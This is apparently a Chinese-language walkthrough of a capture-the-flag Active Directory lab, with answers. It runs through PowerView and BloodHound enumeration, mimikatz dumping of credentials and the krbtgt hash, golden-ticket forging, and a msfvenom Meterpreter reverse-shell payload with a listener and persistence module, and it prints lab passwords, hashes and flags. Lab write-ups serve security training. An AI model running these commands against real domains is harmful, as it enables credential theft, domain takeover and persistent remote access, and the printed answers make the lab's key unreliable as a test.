首先我们要在绕过执行策略的情况下启动 PowerShell,以便我们可以运行脚本
powershell -ep bypass
接着我们可以启动 PowerView 并枚举域用户
. .\Downloads\PowerView.ps1
Get-NetUser | select cn
还可以枚举域组
Get-NetGroup -GroupName *admin*
PowerView 备忘单:https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
问题1:默认没有设置的共享文件夹是什么?
回答:Share
Invoke-ShareFinder
问题2:除了 Windows Server 2019,网络内部运行的是什么操作系统?
回答:Windows 10 Enterprise Evaluation
Get-NetComputer -fulldata | select operatingsystem
问题3:我在用户内部隐藏了一个标志找到它
回答:POST{P0W3RV13W_FTW}
首先安装Bloodhound
apt-get install bloodhound
使用 SHARPHOUND 获取loot
# 在绕过执行策略的情况下从cmd启动PowerShell
powershell -ep bypass
# 运行Sharphound PowerShell脚本
. .\Downloads\SharpHound.ps1
# 使用Sharphound收集所有信息并将其存储在zip文件中
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
再使用scp将zip文件传输回kali
scp Administrator@10.10.135.137:20221229050642_loot.zip 20221229050642_loot.zip
接着用Bloodhound映射网络
需要在另一个终端启动Bloodhound之前先启动neo4j(neo4j 5.x的要使用jdk17,4.x版本使用jdk11
./neo4j console
neo4j 默认凭据:neo4j:neo4j
,需要我们访问http://localhost:7474/browser/去更改它,否则后面登录会出错
连接后,它会自动提示我们输入新密码
然后启动Bloodhound
bloodhound
点击Import Graph,导入zip文件
但是他这里报错说是bad json file
于是需要上传最新版本sharphound
scp SharpHound.exe Administrator@10.10.135.137:SharpHound.exe
然后再用它来获取loot.zip
SharpHound.exe --collectionmethods All --domain CONTROLLER.local --zipfilename loot.zip
再通过scp将loot.zip传输到kali
scp Administrator@10.10.135.137:20221229062748_loot.zip 20221229062748_loot.zip
接着导入就可以成功分析Bloodhound
问题1:什么服务也是域管理员
回答:SQLSERVICE
点击“Find all Domain Admins”得到如下:
问题2:哪两个用户是 Kerberoastable 的?
回答:SQLSERVICE,KRBTGT
点击“List all Kerberoastable Accounts”得到如下:
cd Downloads && mimikatz.exe
privilege::debug
lsadump::lsa /patch
问题1:Machine1 密码是什么?
回答:Password1
问题2:什么是 Machine2 哈希?
回答:c39f2beb3d2ec06a62cb887fb391dee0
cd Downloads && mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
通过krbtgt的sid和password hash创建Administrator的黄金票据
# kerberos::golden /user: /domain: /sid: /krbtgt: /id:
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
打开一个新的命令提示符,对所有机器都具有提升的权限
misc::cmd
连接远程桌面
rdesktop -u Administrator -d CONTROLLER 10.10.135.137
使用服务器管理器枚举
问题1:什么工具可以查看事件日志?
回答:Event Viewer
点击”Tools“ - ”Event Viewer“查看如下:
问题2:什么是 SQL 服务密码
回答:MYpassword123#
点击”Tools“ - ”Active Directory Users and Computers“查看如下:
首先msf生成一个马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.150.128 lport=4444 -f exe > shell.exe
再通过scp上传shell.exe
scp shell.exe Administrator@10.10.135.137:shell.exe
msf成功上线
use exploit/multi/handler
set lhost 10.18.98.53
set payload windows/meterpreter/reverse_tcp
run
运行持久化模块
bg
use exploit/windows/local/persistence
set session 1
run